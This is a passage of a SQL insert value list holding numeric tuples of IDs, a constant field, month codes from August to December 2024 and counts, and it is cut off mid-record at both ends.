,9),(2991,2,'202408',9),(3482,2,'202408',9),(3534,2,'202408',9),(4301,2,'202408',9),(4363,2,'202408',9),(4587,2,'202408',9),(4888,2,'202408',9),(4930,2,'202408',9),(4996,2,'202408',9),(5146,2,'202408',9),(471,2,'202408',10),(473,2,'202408',10),(477,2,'202408',10),(481,2,'202408',10),(1598,2,'202408',10),(1711,2,'202408',10),(1749,2,'202408',10),(1770,2,'202408',10),(3030,2,'202408',10),(3275,2,'202408',10),(4412,2,'202408',10),(4582,2,'202408',10),(4709,2,'202408',10),(4771,2,'202408',10),(5062,2,'202408',10),(5131,2,'202408',10),(5140,2,'202408',10),(5353,2,'202408',10),(2161,2,'202408',11),(3096,2,'202408',11),(3104,2,'202408',11),(3263,2,'202408',11),(3749,2,'202408',11),(4457,2,'202408',11),(5037,2,'202408',11),(1590,2,'202408',12),(2252,2,'202408',12),(2617,2,'202408',12),(2964,2,'202408',12),(3092,2,'202408',12),(4765,2,'202408',12),(5054,2,'202408',12),(487,2,'202408',13),(1594,2,'202408',13),(1600,2,'202408',13),(2457,2,'202408',13),(2965,2,'202408',13),(3287,2,'202408',13),(468,2,'202408',14),(479,2,'202408',14),(1596,2,'202408',14),(1774,2,'202408',14),(2309,2,'202408',14),(3005,2,'202408',14),(3541,2,'202408',14),(5076,2,'202408',14),(1743,2,'202408',15),(1776,2,'202408',15),(2775,2,'202408',16),(1602,2,'202408',18),(4416,2,'202408',18),(1586,2,'202408',19),(89,2,'202408',21),(3764,2,'202408',22),(1544,2,'202408',26),(72,2,'202408',28),(1582,2,'202408',29),(4420,2,'202408',31),(3781,2,'202408',35),(3247,2,'202408',40),(2148,2,'202408',53),(3060,2,'202408',73),(68,2,'202408',162),(80,2,'202408',238),(9,2,'202408',70373),(102,2,'202409',1),(108,2,'202409',1),(481,2,'202409',1),(3290,2,'202409',1),(3752,2,'202409',1),(4335,2,'202409',1),(4654,2,'202409',1),(4700,2,'202409',1),(4706,2,'202409',1),(4988,2,'202409',1),(5289,2,'202409',1),(5295,2,'202409',1),(5307,2,'202409',1),(5317,2,'202409',1),(5323,2,'202409',1),(5334,2,'202409',1),(5353,2,'202409',1),(74,2,'202409',2),(110,2,'202409',2),(483,2,'202409',2),(486,2,'202409',2),(487,2,'202409',2),(1584,2,'202409',2),(2748,2,'202409',2),(2964,2,'202409',2),(3034,2,'202409',2),(3127,2,'202409',2),(3710,2,'202409',2),(3724,2,'202409',2),(3749,2,'202409',2),(3774,2,'202409',2),(4323,2,'202409',2),(4341,2,'202409',2),(4608,2,'202409',2),(4674,2,'202409',2),(4691,2,'202409',2),(4703,2,'202409',2),(4712,2,'202409',2),(4753,2,'202409',2),(4983,2,'202409',2),(5033,2,'202409',2),(5253,2,'202409',2),(5268,2,'202409',2),(5271,2,'202409',2),(485,2,'202409',3),(2804,2,'202409',3),(3038,2,'202409',3),(3041,2,'202409',3),(3072,2,'202409',3),(3117,2,'202409',3),(3124,2,'202409',3),(3297,2,'202409',3),(3486,2,'202409',3),(3714,2,'202409',3),(3738,2,'202409',3),(4275,2,'202409',3),(4338,2,'202409',3),(4520,2,'202409',3),(4524,2,'202409',3),(4648,2,'202409',3),(4657,2,'202409',3),(4663,2,'202409',3),(4681,2,'202409',3),(4744,2,'202409',3),(4747,2,'202409',3),(4750,2,'202409',3),(4756,2,'202409',3),(4765,2,'202409',3),(4768,2,'202409',3),(4980,2,'202409',3),(5320,2,'202409',3),(482,2,'202409',4),(1604,2,'202409',4),(1697,2,'202409',4),(3066,2,'202409',4),(3265,2,'202409',4),(3316,2,'202409',4),(3482,2,'202409',4),(3731,2,'202409',4),(3746,2,'202409',4),(4332,2,'202409',4),(4400,2,'202409',4),(4514,2,'202409',4),(4651,2,'202409',4),(4668,2,'202409',4),(4697,2,'202409',4),(4858,2,'202409',4),(4897,2,'202409',4),(5122,2,'202409',4),(5125,2,'202409',4),(5128,2,'202409',4),(5163,2,'202409',4),(5256,2,'202409',4),(5280,2,'202409',4),(5304,2,'202409',4),(5310,2,'202409',4),(5359,2,'202409',4),(335,2,'202409',5),(472,2,'202409',5),(1610,2,'202409',5),(1713,2,'202409',5),(1730,2,'202409',5),(1737,2,'202409',5),(1751,2,'202409',5),(2150,2,'202409',5),(2178,2,'202409',5),(2503,2,'202409',5),(3267,2,'202409',5),(3430,2,'202409',5),(3438,2,'202409',5),(3531,2,'202409',5),(3534,2,'202409',5),(3721,2,'202409',5),(3742,2,'202409',5),(3771,2,'202409',5),(4301,2,'202409',5),(4454,2,'202409',5),(4587,2,'202409',5),(4660,2,'202409',5),(4677,2,'202409',5),(4685,2,'202409',5),(4709,2,'202409',5),(4722,2,'202409',5),(4741,2,'202409',5),(4762,2,'202409',5),(4878,2,'202409',5),(4996,2,'202409',5),(5050,2,'202409',5),(5058,2,'202409',5),(5137,2,'202409',5),(5259,2,'202409',5),(5356,2,'202409',5),(84,2,'202409',6),(91,2,'202409',6),(478,2,'202409',6),(488,2,'202409',6),(1592,2,'202409',6),(1606,2,'202409',6),(1734,2,'202409',6),(1778,2,'202409',6),(2156,2,'202409',6),(3027,2,'202409',6),(3083,2,'202409',6),(3229,2,'202409',6),(3259,2,'202409',6),(3269,2,'202409',6),(3273,2,'202409',6),(3275,2,'202409',6),(3489,2,'202409',6),(3498,2,'202409',6),(3727,2,'202409',6),(3735,2,'202409',6),(4238,2,'202409',6),(4373,2,'202409',6),(4396,2,'202409',6),(4408,2,'202409',6),(4424,2,'202409',6),(4428,2,'202409',6),(4440,2,'202409',6),(4444,2,'202409',6),(4688,2,'202409',6),(4694,2,'202409',6),(4797,2,'202409',6),(4862,2,'202409',6),(4883,2,'202409',6),(4930,2,'202409',6),(4977,2,'202409',6),(5028,2,'202409',6),(5037,2,'202409',6),(5134,2,'202409',6),(5276,2,'202409',6),(5326,2,'202409',6),(5330,2,'202409',6),(5378,2,'202409',6),(5383,2,'202409',6),(476,2,'202409',7),(477,2,'202409',7),(1596,2,'202409',7),(1741,2,'202409',7),(1772,2,'202409',7),(2296,2,'202409',7),(2457,2,'202409',7),(2704,2,'202409',7),(2911,2,'202409',7),(2991,2,'202409',7),(3069,2,'202409',7),(3090,2,'202409',7),(3253,2,'202409',7),(3271,2,'202409',7),(3278,2,'202409',7),(3282,2,'202409',7),(3313,2,'202409',7),(4329,2,'202409',7),(4382,2,'202409',7),(4436,2,'202409',7),(4551,2,'202409',7),(4582,2,'202409',7),(4893,2,'202409',7),(4976,2,'202409',7),(5071,2,'202409',7),(5153,2,'202409',7),(5157,2,'202409',7),(5363,2,'202409',7),(1612,2,'202409',8),(1699,2,'202409',8),(1732,2,'202409',8),(1739,2,'202409',8),(2159,2,'202409',8),(2252,2,'202409',8),(2813,2,'202409',8),(3045,2,'202409',8),(3063,2,'202409',8),(3243,2,'202409',8),(3251,2,'202409',8),(3263,2,'202409',8),(3287,2,'202409',8),(3307,2,'202409',8),(3541,2,'202409',8),(4368,2,'202409',8),(4387,2,'202409',8),(4404,2,'202409',8),(4448,2,'202409',8),(4457,2,'202409',8),(4529,2,'202409',8),(4546,2,'202409',8),(4771,2,'202409',8),(4802,2,'202409',8),(4866,2,'202409',8),(4888,2,'202409',8),(5046,2,'202409',8),(5067,2,'202409',8),(5080,2,'202409',8),(5140,2,'202409',8),(5298,2,'202409',8),(87,2,'202409',9),(1695,2,'202409',9),(1701,2,'202409',9),(1705,2,'202409',9),(1720,2,'202409',9),(1724,2,'202409',9),(1768,2,'202409',9),(3023,2,'202409',9),(3030,2,'202409',9),(3109,2,'202409',9),(3240,2,'202409',9),(3249,2,'202409',9),(3261,2,'202409',9),(4556,2,'202409',9),(4566,2,'202409',9),(4591,2,'202409',9),(5024,2,'202409',9),(5062,2,'202409',9),(5292,2,'202409',9),(5314,2,'202409',9),(479,2,'202409',10),(1594,2,'202409',10),(1745,2,'202409',10),(1770,2,'202409',10),(1782,2,'202409',10),(2809,2,'202409',10),(2989,2,'202409',10),(3006,2,'202409',10),(3107,2,'202409',10),(3764,2,'202409',10),(3777,2,'202409',10),(4363,2,'202409',10),(4432,2,'202409',10),(4645,2,'202409',10),(4792,2,'202409',10),(4870,2,'202409',10),(5054,2,'202409',10),(5248,2,'202409',10),(5301,2,'202409',10),(1598,2,'202409',11),(1608,2,'202409',11),(1709,2,'202409',11),(1715,2,'202409',11),(2165,2,'202409',11),(2658,2,'202409',11),(2769,2,'202409',11),(2904,2,'202409',11),(2956,2,'202409',11),(2965,2,'202409',11),(3087,2,'202409',11),(3092,2,'202409',11),(3479,2,'202409',11),(4357,2,'202409',11),(4517,2,'202409',11),(4542,2,'202409',11),(5101,2,'202409',11),(5146,2,'202409',11),(5374,2,'202409',11),(469,2,'202409',12),(570,2,'202409',12),(1586,2,'202409',12),(1588,2,'202409',12),(1590,2,'202409',12),(1707,2,'202409',12),(2152,2,'202409',12),(2293,2,'202409',12),(3079,2,'202409',12),(3257,2,'202409',12),(4874,2,'202409',12),(5042,2,'202409',12),(5076,2,'202409',12),(5264,2,'202409',12),(1722,2,'202409',13),(1726,2,'202409',13),(1728,2,'202409',13),(2558,2,'202409',13),(3280,2,'202409',13),(4326,2,'202409',13),(4377,2,'202409',13),(4412,2,'202409',13),(4416,2,'202409',13),(4612,2,'202409',13),(4776,2,'202409',13),(473,2,'202409',14),(474,2,'202409',14),(480,2,'202409',14),(484,2,'202409',14),(1600,2,'202409',14),(1747,2,'202409',14),(1776,2,'202409',14),(2063,2,'202409',14),(2161,2,'202409',14),(2248,2,'202409',14),(3004,2,'202409',14),(3285,2,'202409',14),(5020,2,'202409',14),(5131,2,'202409',14),(468,2,'202409',15),(471,2,'202409',15),(1602,2,'202409',15),(1711,2,'202409',15),(2154,2,'202409',15),(2609,2,'202409',15),(2775,2,'202409',15),(2801,2,'202409',15),(2993,2,'202409',15),(1614,2,'202409',16),(1703,2,'202409',16),(1780,2,'202409',16),(2309,2,'202409',16),(3005,2,'202409',17),(3102,2,'202409',17),(3104,2,'202409',17),(76,2,'202409',18),(467,2,'202409',18),(2297,2,'202409',18),(3226,2,'202409',18),(470,2,'202409',19),(1544,2,'202409',19),(1718,2,'202409',19),(1749,2,'202409',19),(1766,2,'202409',19),(4391,2,'202409',19),(4759,2,'202409',19),(3096,2,'202409',20),(2617,2,'202409',21),(1582,2,'202409',22),(2751,2,'202409',22),(89,2,'202409',23),(1774,2,'202409',23),(3245,2,'202409',23),(72,2,'202409',24),(1743,2,'202409',27),(4420,2,'202409',30),(3060,2,'202409',32),(3781,2,'202409',41),(3247,2,'202409',46),(2148,2,'202409',54),(68,2,'202409',168),(80,2,'202409',227),(9,2,'202409',150161),(87,2,'202410',1),(106,2,'202410',1),(108,2,'202410',1),(476,2,'202410',1),(1739,2,'202410',1),(1768,2,'202410',1),(1778,2,'202410',1),(2804,2,'202410',1),(2809,2,'202410',1),(3127,2,'202410',1),(3249,2,'202410',1),(3282,2,'202410',1),(3721,2,'202410',1),(3735,2,'202410',1),(3749,2,'202410',1),(3771,2,'202410',1),(3777,2,'202410',1),(4408,2,'202410',1),(4546,2,'202410',1),(4591,2,'202410',1),(4654,2,'202410',1),(4660,2,'202410',1),(4663,2,'202410',1),(4668,2,'202410',1),(4674,2,'202410',1),(4685,2,'202410',1),(4700,2,'202410',1),(4703,2,'202410',1),(4706,2,'202410',1),(4709,2,'202410',1),(4768,2,'202410',1),(4771,2,'202410',1),(4797,2,'202410',1),(4862,2,'202410',1),(4866,2,'202410',1),(4888,2,'202410',1),(4893,2,'202410',1),(4988,2,'202410',1),(5024,2,'202410',1),(5131,2,'202410',1),(5140,2,'202410',1),(5157,2,'202410',1),(5163,2,'202410',1),(5253,2,'202410',1),(5264,2,'202410',1),(5271,2,'202410',1),(5280,2,'202410',1),(5289,2,'202410',1),(5317,2,'202410',1),(5334,2,'202410',1),(5353,2,'202410',1),(5356,2,'202410',1),(5378,2,'202410',1),(91,2,'202410',2),(110,2,'202410',2),(1590,2,'202410',2),(1612,2,'202410',2),(1705,2,'202410',2),(1715,2,'202410',2),(1782,2,'202410',2),(2063,2,'202410',2),(2704,2,'202410',2),(2769,2,'202410',2),(2813,2,'202410',2),(2911,2,'202410',2),(2965,2,'202410',2),(2991,2,'202410',2),(3083,2,'202410',2),(3090,2,'202410',2),(3109,2,'202410',2),(3243,2,'202410',2),(3251,2,'202410',2),(3257,2,'202410',2),(3297,2,'202410',2),(3531,2,'202410',2),(3710,2,'202410',2),(3724,2,'202410',2),(3752,2,'202410',2),(4326,2,'202410',2),(4335,2,'202410',2),(4338,2,'202410',2),(4424,2,'202410',2),(4428,2,'202410',2),(4436,2,'202410',2),(4551,2,'202410',2),(4556,2,'202410',2),(4608,2,'202410',2),(4648,2,'202410',2),(4657,2,'202410',2),(4681,2,'202410',2),(4691,2,'202410',2),(4741,2,'202410',2),(4756,2,'202410',2),(4792,2,'202410',2),(4802,2,'202410',2),(4858,2,'202410',2),(4870,2,'202410',2),(4874,2,'202410',2),(4878,2,'202410',2),(4897,2,'202410',2),(4977,2,'202410',2),(4980,2,'202410',2),(5020,2,'202410',2),(5033,2,'202410',2),(5037,2,'202410',2),(5042,2,'202410',2),(5062,2,'202410',2),(5122,2,'202410',2),(5128,2,'202410',2),(5295,2,'202410',2),(5304,2,'202410',2),(5307,2,'202410',2),(102,2,'202410',3),(335,2,'202410',3),(485,2,'202410',3),(1606,2,'202410',3),(1707,2,'202410',3),(1709,2,'202410',3),(1741,2,'202410',3),(1747,2,'202410',3),(1751,2,'202410',3),(2178,2,'202410',3),(2956,2,'202410',3),(2989,2,'202410',3),(3124,2,'202410',3),(3259,2,'202410',3),(3267,2,'202410',3),(3275,2,'202410',3),(3280,2,'202410',3),(3438,2,'202410',3),(3486,2,'202410',3),(3534,2,'202410',3),(3731,2,'202410',3),(4332,2,'202410',3),(4396,2,'202410',3),(4444,2,'202410',3),(4448,2,'202410',3),(4587,2,'202410',3),(4651,2,'202410',3),(4712,2,'202410',3),(4750,2,'202410',3),(4753,2,'202410',3),(4930,2,'202410',3),(5046,2,'202410',3),(5058,2,'202410',3),(5101,2,'202410',3),(5134,2,'202410',3),(5292,2,'202410',3),(5298,2,'202410',3),(5310,2,'202410',3),(5320,2,'202410',3),(5330,2,'202410',3),(5363,2,'202410',3),(5383,2,'202410',3),(74,2,'202410',4),(84,2,'202410',4),(1584,2,'202410',4),(1588,2,'202410',4),(1766,2,'202410',4),(2150,2,'202410',4),(2993,2,'202410',4),(3023,2,'202410',4),(3041,2,'202410',4),(3066,2,'202410',4),(3240,2,'202410',4),(3265,2,'202410',4),(3273,2,'202410',4),(3541,2,'202410',4),(3746,2,'202410',4),(4301,2,'202410',4),(4357,2,'202410',4),(4368,2,'202410',4),(4454,2,'202410',4),(4514,2,'202410',4),(4517,2,'202410',4),(4524,2,'202410',4),(4582,2,'202410',4),(4612,2,'202410',4),(4645,2,'202410',4),(4677,2,'202410',4),(4697,2,'202410',4),(4762,2,'202410',4),(4765,2,'202410',4),(4976,2,'202410',4),(5054,2,'202410',4),(5153,2,'202410',4),(5359,2,'202410',4),(5374,2,'202410',4),(478,2,'202410',5),(486,2,'202410',5),(1604,2,'202410',5),(1610,2,'202410',5),(1701,2,'202410',5),(1737,2,'202410',5),(2964,2,'202410',5),(3027,2,'202410',5),(3063,2,'202410',5),(3072,2,'202410',5),(3102,2,'202410',5),(3285,2,'202410',5),(3287,2,'202410',5),(3489,2,'202410',5),(4377,2,'202410',5),(4391,2,'202410',5),(4529,2,'202410',5),(5137,2,'202410',5),(5259,2,'202410',5),(5268,2,'202410',5),(472,2,'202410',6),(479,2,'202410',6),(1594,2,'202410',6),(1596,2,'202410',6),(1776,2,'202410',6),(2152,2,'202410',6),(2159,2,'202410',6),(2296,2,'202410',6),(2748,2,'202410',6),(3004,2,'202410',6),(3030,2,'202410',6),(3038,2,'202410',6),(3245,2,'202410',6),(3278,2,'202410',6),(3313,2,'202410',6),(3482,2,'202410',6),(3498,2,'202410',6),(4329,2,'202410',6),(4520,2,'202410',6),(5028,2,'202410',6),(5248,2,'202410',6),(483,2,'202410',7),(487,2,'202410',7),(1608,2,'202410',7),(1722,2,'202410',7),(1734,2,'202410',7),(1770,2,'202410',7),(2293,2,'202410',7),(2309,2,'202410',7),(2609,2,'202410',7),(3117,2,'202410',7),(3290,2,'202410',7),(3307,2,'202410',7),(3714,2,'202410',7),(4275,2,'202410',7),(4341,2,'202410',7),(4404,2,'202410',7),(4694,2,'202410',7),(4996,2,'202410',7),(5301,2,'202410',7),(481,2,'202410',8),(1720,2,'202410',8),(1728,2,'202410',8),(1730,2,'202410',8),(3271,2,'202410',8),(3479,2,'202410',8),(4238,2,'202410',8),(4323,2,'202410',8),(4363,2,'202410',8),(4400,2,'202410',8),(4416,2,'202410',8),(4883,2,'202410',8),(5067,2,'202410',8),(5314,2,'202410',8),(5326,2,'202410',8),(482,2,'202410',9),(488,2,'202410',9),(1600,2,'202410',9),(1614,2,'202410',9),(1703,2,'202410',9),(1718,2,'202410',9),(1774,2,'202410',9),(2252,2,'202410',9),(2558,2,'202410',9),(3006,2,'202410',9),(3034,2,'202410',9),(3104,2,'202410',9),(3107,2,'202410',9),(3226,2,'202410',9),(4566,2,'202410',9),(471,2,'202410',10),(480,2,'202410',10),(570,2,'202410',10),(1695,2,'202410',10),(1711,2,'202410',10),(2154,2,'202410',10),(2503,2,'202410',10),(2904,2,'202410',10),(4432,2,'202410',10),(4776,2,'202410',10),(5125,2,'202410',10),(72,2,'202410',11),(89,2,'202410',11),(469,2,'202410',11),(470,2,'202410',11),(477,2,'202410',11),(1713,2,'202410',11),(1726,2,'202410',11),(2457,2,'202410',11),(2617,2,'202410',11),(3069,2,'202410',11),(3229,2,'202410',11),(3253,2,'202410',11),(484,2,'202410',12),(1592,2,'202410',12),(1598,2,'202410',12),(2775,2,'202410',12),(3096,2,'202410',12),(3738,2,'202410',12),(4542,2,'202410',12),(473,2,'202410',13),(474,2,'202410',13),(1586,2,'202410',13),(2161,2,'202410',13),(3087,2,'202410',13),(3764,2,'202410',13),(5076,2,'202410',13),(467,2,'202410',14),(2297,2,'202410',14),(1602,2,'202410',15),(4722,2,'202410',15),(1699,2,'202410',16),(1724,2,'202410',16),(1745,2,'202410',16),(1780,2,'202410',16),(2165,2,'202410',16),(2248,2,'202410',16),(3005,2,'202410',16),(4412,2,'202410',16),(4420,2,'202410',16),(76,2,'202410',17),(4457,2,'202410',17),(1582,2,'202410',18),(1732,2,'202410',18),(3097,2,'202410',18),(3263,2,'202410',18),(468,2,'202410',19),(1772,2,'202410',19),(2801,2,'202410',19),(3261,2,'202410',19),(2658,2,'202410',20),(3092,2,'202410',20),(1544,2,'202410',21),(4759,2,'202410',22),(1743,2,'202410',24),(1749,2,'202410',24),(5146,2,'202410',26),(3079,2,'202410',27),(2751,2,'202410',28),(3781,2,'202410',29),(3060,2,'202410',30),(2148,2,'202410',53),(3247,2,'202410',78),(68,2,'202410',163),(80,2,'202410',230),(9,2,'202410',82653),(76,2,'202411',1),(335,2,'202411',1),(482,2,'202411',1),(483,2,'202411',1),(1584,2,'202411',1),(1590,2,'202411',1),(1701,2,'202411',1),(1705,2,'202411',1),(1713,2,'202411',1),(1734,2,'202411',1),(1768,2,'202411',1),(1776,2,'202411',1),(1782,2,'202411',1),(2161,2,'202411',1),(2293,2,'202411',1),(2748,2,'202411',1),(2809,2,'202411',1),(2813,2,'202411',1),(2911,2,'202411',1),(3066,2,'202411',1),(3127,2,'202411',1),(3243,2,'202411',1),(3249,2,'202411',1),(3269,2,'202411',1),(3273,2,'202411',1),(3280,2,'202411',1),(3282,2,'202411',1),(3316,2,'202411',1),(3710,2,'202411',1),(3714,2,'202411',1),(3721,2,'202411',1),(3727,2,'202411',1),(3735,2,'202411',1),(3742,2,'202411',1),(3774,2,'202411',1),(4332,2,'202411',1),(4341,2,'202411',1),(4363,2,'202411',1),(4373,2,'202411',1),(4377,2,'202411',1),(4440,2,'202411',1),(4514,2,'202411',1),(4524,2,'202411',1),(4587,2,'202411',1),(4654,2,'202411',1),(4681,2,'202411',1),(4685,2,'202411',1),(4706,2,'202411',1),(4722,2,'202411',1),(4744,2,'202411',1),(4762,2,'202411',1),(4768,2,'202411',1),(4776,2,'202411',1),(4792,2,'202411',1),(4870,2,'202411',1),(4874,2,'202411',1),(4878,2,'202411',1),(4976,2,'202411',1),(4980,2,'202411',1),(4988,2,'202411',1),(5020,2,'202411',1),(5062,2,'202411',1),(5131,2,'202411',1),(5134,2,'202411',1),(5256,2,'202411',1),(5259,2,'202411',1),(5276,2,'202411',1),(5289,2,'202411',1),(5295,2,'202411',1),(5314,2,'202411',1),(5330,2,'202411',1),(5353,2,'202411',1),(5363,2,'202411',1),(5374,2,'202411',1),(5378,2,'202411',1),(91,2,'202411',2),(102,2,'202411',2),(108,2,'202411',2),(469,2,'202411',2),(470,2,'202411',2),(471,2,'202411',2),(479,2,'202411',2),(480,2,'202411',2),(481,2,'202411',2),(484,2,'202411',2),(485,2,'202411',2),(486,2,'202411',2),(488,2,'202411',2),(1730,2,'202411',2),(1747,2,'202411',2),(1770,2,'202411',2),(1778,2,'202411',2),(2159,2,'202411',2),(2178,2,'202411',2),(2248,2,'202411',2),(2252,2,'202411',2),(2801,2,'202411',2),(2964,2,'202411',2),(3005,2,'202411',2),(3096,2,'202411',2),(3240,2,'202411',2),(3251,2,'202411',2),(3259,2,'202411',2),(3267,2,'202411',2),(3307,2,'202411',2),(3430,2,'202411',2),(3479,2,'202411',2),(3489,2,'202411',2),(3498,2,'202411',2),(3531,2,'202411',2),(3541,2,'202411',2),(3724,2,'202411',2),(4329,2,'202411',2),(4391,2,'202411',2),(4400,2,'202411',2),(4432,2,'202411',2),(4517,2,'202411',2),(4529,2,'202411',2),(4551,2,'202411',2),(4648,2,'202411',2),(4651,2,'202411',2),(4657,2,'202411',2),(4674,2,'202411',2),(4691,2,'202411',2),(4712,2,'202411',2),(4858,2,'202411',2),(4888,2,'202411',2),(4893,2,'202411',2),(4897,2,'202411',2),(4977,2,'202411',2),(4983,2,'202411',2),(5033,2,'202411',2),(5058,2,'202411',2),(5067,2,'202411',2),(5125,2,'202411',2),(5128,2,'202411',2),(5137,2,'202411',2),(5157,2,'202411',2),(5271,2,'202411',2),(5304,2,'202411',2),(5310,2,'202411',2),(5317,2,'202411',2),(5356,2,'202411',2),(5359,2,'202411',2),(84,2,'202411',3),(87,2,'202411',3),(473,2,'202411',3),(474,2,'202411',3),(477,2,'202411',3),(487,2,'202411',3),(570,2,'202411',3),(1604,2,'202411',3),(1606,2,'202411',3),(1718,2,'202411',3),(1737,2,'202411',3),(2152,2,'202411',3),(2558,2,'202411',3),(2704,2,'202411',3),(2956,2,'202411',3),(2991,2,'202411',3),(3030,2,'202411',3),(3034,2,'202411',3),(3072,2,'202411',3),(3083,2,'202411',3),(3226,2,'202411',3),(3253,2,'202411',3),(3271,2,'202411',3),(3777,2,'202411',3),(4323,2,'202411',3),(4326,2,'202411',3),(4428,2,'202411',3),(4444,2,'202411',3),(4454,2,'202411',3),(4520,2,'202411',3),(4608,2,'202411',3),(4645,2,'202411',3),(4753,2,'202411',3),(5042,2,'202411',3),(5080,2,'202411',3),(5140,2,'202411',3),(5248,2,'202411',3),(5298,2,'202411',3),(5301,2,'202411',3),(478,2,'202411',4),(1703,2,'202411',4),(1715,2,'202411',4),(1739,2,'202411',4),(2297,2,'202411',4),(2457,2,'202411',4),(2503,2,'202411',4),(2617,2,'202411',4),(3041,2,'202411',4),(3045,2,'202411',4),(3104,2,'202411',4),(3109,2,'202411',4),(3278,2,'202411',4),(3746,2,'202411',4),(4404,2,'202411',4),(4416,2,'202411',4),(4420,2,'202411',4),(4436,2,'202411',4),(4612,2,'202411',4),(4703,2,'202411',4),(4771,2,'202411',4),(4883,2,'202411',4),(5071,2,'202411',4),(5268,2,'202411',4),(5320,2,'202411',4),(468,2,'202411',5),(1544,2,'202411',5),(1598,2,'202411',5),(1614,2,'202411',5),(1709,2,'202411',5),(2609,2,'202411',5),(3265,2,'202411',5),(3285,2,'202411',5),(3438,2,'202411',5),(3534,2,'202411',5),(4301,2,'202411',5),(4335,2,'202411',5),(4694,2,'202411',5),(4741,2,'202411',5),(5101,2,'202411',5),(5280,2,'202411',5),(5307,2,'202411',5),(89,2,'202411',6),(472,2,'202411',6),(1588,2,'202411',6),(1594,2,'202411',6),(1720,2,'202411',6),(1774,2,'202411',6),(2154,2,'202411',6),(2296,2,'202411',6),(2965,2,'202411',6),(3006,2,'202411',6),(3764,2,'202411',6),(4457,2,'202411',6),(5024,2,'202411',6),(5046,2,'202411',6),(1586,2,'202411',7),(1695,2,'202411',7),(1722,2,'202411',7),(1751,2,'202411',7),(2165,2,'202411',7),(3004,2,'202411',7),(4412,2,'202411',7),(4750,2,'202411',7),(1596,2,'202411',8),(2150,2,'202411',8),(2775,2,'202411',8),(3107,2,'202411',8),(1592,2,'202411',9),(1600,2,'202411',9),(1711,2,'202411',9),(3023,2,'202411',9),(3124,2,'202411',9),(4382,2,'202411',9),(5153,2,'202411',9),(5163,2,'202411',9),(476,2,'202411',10),(72,2,'202411',11),(74,2,'202411',11),(1612,2,'202411',11),(2309,2,'202411',11),(3038,2,'202411',11),(4996,2,'202411',11),(5146,2,'202411',11),(3069,2,'202411',12),(3090,2,'202411',12),(4866,2,'202411',12),(1602,2,'202411',13),(2769,2,'202411',14),(3117,2,'202411',14),(5076,2,'202411',16),(4759,2,'202411',18),(1610,2,'202411',19),(4542,2,'202411',19),(2904,2,'202411',21),(1766,2,'202411',22),(3263,2,'202411',23),(1728,2,'202411',26),(1732,2,'202411',27),(2751,2,'202411',28),(3261,2,'202411',28),(1582,2,'202411',30),(1745,2,'202411',31),(1749,2,'202411',31),(1772,2,'202411',31),(3092,2,'202411',32),(1743,2,'202411',33),(1780,2,'202411',33),(3079,2,'202411',34),(3097,2,'202411',34),(3781,2,'202411',34),(1699,2,'202411',37),(1724,2,'202411',42),(2658,2,'202411',42),(2148,2,'202411',57),(3247,2,'202411',97),(3060,2,'202411',107),(68,2,'202411',156),(80,2,'202411',174),(9,2,'202411',69189),(471,2,'202412',1),(480,2,'202412',1),(481,2,'202412',1),(483,2,'202412',1),(485,2,'202412',1),(1695,2,'202412',1),(1741,2,'202412',1),(1747,2,'202412',1),(2152,2,'202412',1),(2252,2,'202412',1),(2296,2,'202412',1),(2769,2,'202412',1),(2809,2,'202412',1),(2911,2,'202412',1),(2956,2,'202412',1),(2965,2,'202412',1),(2991,2,'202412',1),(3006,2,'202412',1),(3072,2,'202412',1),(3083,2,'202412',1),(3127,2,'202412',1),(3257,2,'202412',1),(3271,2,'202412',1),(3273,2,'202412',1),(3280,2,'202412',1),(3721,2,'202412',1),(3727,2,'202412',1),(3731,2,'202412',1),(3742,2,'202412',1),(3749,2,'202412',1),(3752,2,'202412',1),(3771,2,'202412',1),(4238,2,'202412',1),(4326,2,'202412',1),(4416,2,'202412',1),(4520,2,'202412',1),(4524,2,'202412',1),(4551,2,'202412',1),(4556,2,'202412',1),(4582,2,'202412',1),(4608,2,'202412',1),(4645,2,'202412',1),(4651,2,'202412',1),(4657,2,'202412',1),(4674,2,'202412',1),(4700,2,'202412',1),(4703,2,'202412',1),(4706,2,'202412',1),(4744,2,'202412',1),(4750,2,'202412',1),(4765,2,'202412',1),(4768,2,'202412',1),(4797,2,'202412',1),(4802,2,'202412',1),(4874,2,'202412',1),(4883,2,'202412',1),(4893,2,'202412',1),(4976,2,'202412',1),(4977,2,'202412',1),(4980,2,'202412',1),(4988,2,'202412',1),(5033,2,'202412',1),(5037,2,'202412',1),(5042,2,'202412',1),(5046,2,'202412',1),(5058,2,'202412',1),(5157,2,'202412',1),(5271,2,'202412',1),(5276,2,'202412',1),(5298,2,'202412',1),(5301,2,'202412',1),(5314,2,'202412',1),(5317,2,'202412',1),(5323,2,'202412',1),(5334,2,'202412',1),(5353,2,'202412',1),(84,2,'202412',2),(91,2,'202412',2),(110,2,'202412',2),(469,2,'202412',2),(477,2,'202412',2),(482,2,'202412',2),(484,2,'202412',2),(570,2,'202412',2),(1604,2,'202412',2),(1606,2,'202412',2),(1709,2,'202412',2),(1718,2,'202412',2),(1720,2,'202412',2),(1737,2,'202412',2),(1774,2,'202412',2),(2063,2,'202412',2),(2159,2,'202412',2),(2617,2,'202412',2),(2989,2,'202412',2),(3004,2,'202412',2),(3005,2,'202412',2),(3045,2,'202412',2),(3087,2,'202412',2),(3107,2,'202412',2),(3240,2,'202412',2),(3282,2,'202412',2),(3438,2,'202412',2),(3479,2,'202412',2),(3482,2,'202412',2),(3498,2,'202412',2),(3541,2,'202412',2),(3710,2,'202412',2),(3746,2,'202412',2),(4323,2,'202412',2),(4329,2,'202412',2),(4335,2,'202412',2),(4387,2,'202412',2),(4400,2,'202412',2),(4436,2,'202412',2),(4546,2,'202412',2),(4587,2,'202412',2),(4591,2,'202412',2),(4668,2,'202412',2),(4681,2,'202412',2),(4691,2,'202412',2),(4747,2,'202412',2),(4753,2,'202412',2),(4756,2,'202412',2),(4762,2,'202412',2),(4858,2,'202412',2),(5028,2,'202412',2),(5067,2,'202412',2),(5080,2,'202412',2),(5101,2,'202412',2),(5122,2,'202412',2),(5125,2,'202412',2),(5128,2,'202412',2),(5137,2,'202412',2),(5153,2,'202412',2),(5256,2,'202412',2),(5259,2,'202412',2),(5268,2,'202412',2),(5289,2,'202412',2),(5307,2,'202412',2),(5310,2,'202412',2),(5320,2,'202412',2),(5359,2,'202412',2),(89,2,'202412',3),(467,2,'202412',3),(474,2,'202412',3),(479,2,'202412',3),(1608,2,'202412',3),(1711,2,'202412',3),(1739,2,'202412',3),(1776,2,'202412',3),(2248,2,'202412',3),(2609,2,'202412',3),(3027,2,'20241